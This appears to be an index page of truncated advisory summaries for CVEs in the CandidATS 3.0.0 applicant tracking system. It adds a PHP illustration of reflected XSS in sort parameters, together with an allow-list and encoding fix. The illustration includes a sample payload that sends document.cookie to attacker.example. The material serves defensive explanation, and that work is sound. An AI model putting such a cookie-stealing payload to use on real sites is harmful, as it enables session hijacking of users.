"CVE-2022-42744: Unrestricted CRUD Operations in CandidATS 3.0.0 Lead to Database Compromise"
Overview: CandidATS version 3.0.0 has a security vulnerability that allows an external attacker to perform Create, Read, Update, and Delete (CRUD) operations on the application databases. The
CVE-2022-42748: Cross-Site Scripting Vulnerability in CandidATS 3.0.0's 'sortDirection' Parameter in 'ajax.php'
A recent vulnerability, identified as CVE-2022-42748, found in CandidATS version 3.0.0 on the 'sortDirection' parameter of the 'ajax.php' resource, allows
CVE-2022-42747: Unauthenticated XSS Vulnerability in CandidATS 3.0.0 through 'sortBy' of the 'ajax.php' Resource
A critical security vulnerability has been identified in CandidATS version 3.0.0. This vulnerability (CVE-2022-42747) allows an unauthenticated external attacker to steal the cookie of arbitrary
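The two 'ajax.php' entries above (CVE-2022-42748 on 'sortDirection' and CVE-2022-42747 on 'sortBy') describe the same vulnerability class: a sort parameter reflected into the response without validation or encoding. The following PHP is an added illustration of that class and its fix; it is not CandidATS code, and the function names, the column allow-list and the constructed request are assumptions for the example.

```php
<?php
// Illustrative, not CandidATS code: a reflected-XSS pattern in a sort handler
// and its hardened counterpart. Function names, allowed columns and the
// sample request below are assumptions made for this example.

// Vulnerable pattern: untrusted query parameters are echoed straight into HTML.
function render_sort_link_vulnerable(array $query): string
{
    $sortBy        = $query['sortBy'] ?? 'dateCreated';
    $sortDirection = $query['sortDirection'] ?? 'ASC';
    // Attacker-controlled values land in the markup unchanged, so a value
    // such as sortBy="><script>...</script> executes in the visitor's browser.
    return '<a href="?sortBy=' . $sortBy . '&sortDirection=' . $sortDirection . '">Sort</a>';
}

// Hardened pattern: allow-list both values, then encode on output regardless.
const ALLOWED_SORT_COLUMNS    = ['dateCreated', 'lastName', 'firstName', 'status'];
const ALLOWED_SORT_DIRECTIONS = ['ASC', 'DESC'];

function render_sort_link_hardened(array $query): string
{
    $sortBy = $query['sortBy'] ?? 'dateCreated';
    if (!in_array($sortBy, ALLOWED_SORT_COLUMNS, true)) {
        $sortBy = 'dateCreated';               // unknown column: fall back, do not reflect
    }
    $sortDirection = strtoupper((string) ($query['sortDirection'] ?? 'ASC'));
    if (!in_array($sortDirection, ALLOWED_SORT_DIRECTIONS, true)) {
        $sortDirection = 'ASC';
    }
    // Build the query string from the validated values and HTML-encode the
    // result so the link is safe even if the allow-list is later widened.
    $href = '?' . http_build_query(['sortBy' => $sortBy, 'sortDirection' => $sortDirection]);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">Sort</a>';
}

// Constructed request (not a real capture) carrying a cookie-stealing payload.
$malicious = [
    'sortBy'        => '"><script>location="https://attacker.example/?c="+document.cookie</script>',
    'sortDirection' => 'ASC',
];

echo render_sort_link_vulnerable($malicious), "\n";  // script tag reaches the browser
echo render_sort_link_hardened($malicious), "\n";    // payload discarded, output encoded
```

The allow-list is the real fix: a sort column or direction has a tiny set of legal values, so anything else should be rejected rather than sanitized. Marking the session cookie HttpOnly (for example via `session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax'])` before `session_start()`) limits the impact of any remaining injection, because `document.cookie` can no longer read it, but it does not remove the XSS itself.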
CVE-2022-42745: Exploiting XXE in CandidATS 3.0.0 to Read Arbitrary Files
CandidATS, an open-source Applicant Tracking System, is widely used by organizations to manage the recruitment process. Recently, a security vulnerability, CVE-2022-42745, has been discovered
CVE-2022-42751: Critical Privilege Escalation in CandidATS (v3..) Leveraging CSRF Vulnerabilities - Exploit Details, PoC, and Remediation
CandidATS, a popular open-source Applicant Tracking System (ATS) is reportedly affected by a high-impact Critical Privilege Escalation vulnerability (CVE-2022-42751) found in version 3... The vulnerability